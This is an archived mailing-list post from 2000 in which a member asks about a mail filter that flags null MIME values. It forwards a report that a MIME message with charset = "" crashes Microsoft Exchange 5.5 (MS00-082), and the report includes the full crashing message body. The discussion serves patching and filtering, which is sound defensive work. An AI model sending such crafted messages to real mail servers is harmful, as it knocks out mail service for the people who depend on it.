[Esa-l] Exploit scenario: Microsoft Security Bulletin (MS00-082) (fwd)

John D. Hardin jhardin at wolfenet.com
Sun Nov 5 09:10:02 PST 2000

I have a first-cut sanitization of this, which triggers on *any* MIME
value being explicitly set to null.

Does anybody know whether this shotgun approach will break anything?
Is there any legitimate reason to explicitly set some value in a MIME
header to null?

Beta testers welcome.

 John Hardin KA7OHZ   ICQ#15735746   http://www.wolfenet.com/~jhardin/
 jhardin at wolfenet.com      pgpk -a finger://gonzo.wolfenet.com/jhardin
  768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76 
 1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
  "Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
  does quite what I want. I wish Christopher Robin was here."
				-- Peter da Silva in a.s.r
   2 days until the political ads stop - don't forget to vote!

---------- Abridged Forwarded message ----------
Date: Thu, 2 Nov 2000 15:02:54 -0500
From: Art Savelev <asavelev at ENI-NET.COM>
Subject: Exploit scenario: Microsoft Security Bulletin (MS00-082)

The following body of the e-mail message causes Microsoft Exchange 5.5
SP3 Internet Mail Service and Information Store to crash
Refer to Microsoft Security Bulletin (MS00-082)
Patch is available here:

The source of the problem is charset = ""


MIME-Version: 1.0
Content-Type: multipart/alternative;
     boundary="=_ Boundary 1-KTwEv4jY84Hk"

--=_ Boundary 1-KTwEv4jY84Hk
Content-Type: text/plain;
        charset = ""
Content-Transfer-Encoding: 7bit

This message is test

--=_ Boundary 1-KTwEv4jY84Hk--

Art Savelev

More information about the esd-l mailing list